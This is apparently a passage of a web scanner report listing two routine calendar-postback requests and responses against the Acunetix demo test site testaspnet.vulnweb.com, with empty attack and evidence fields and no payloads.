vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8415&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAAnKL9toIZGRkwJnEZ3360N33%2BRRgRJmGqW1yB4g%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEicWgCQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXNpeFWi1UnHOZcvS7sBQgkrnlANg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:22 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAAnKL9toIZGRkwJnEZ3360N33+RRgRJmGqW1yB4g=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEicWgCQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXNpeFWi1UnHOZcvS7sBQgkrnlANg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:White" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8444&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBA%2FT9VDdsIZGRkxPAoCcQmov17WVrPi9jEwE5Uw3o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEtOrmBQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXKh7Qp0boJjDZ%2BNPBJ8rcCYIuTy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:54 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBA/T9VDdsIZGRkxPAoCcQmov17WVrPi9jEwE5Uw3o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEtOrmBQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXKh7Qp0boJjDZ+NPBJ8rcCYIuTy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:White" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged 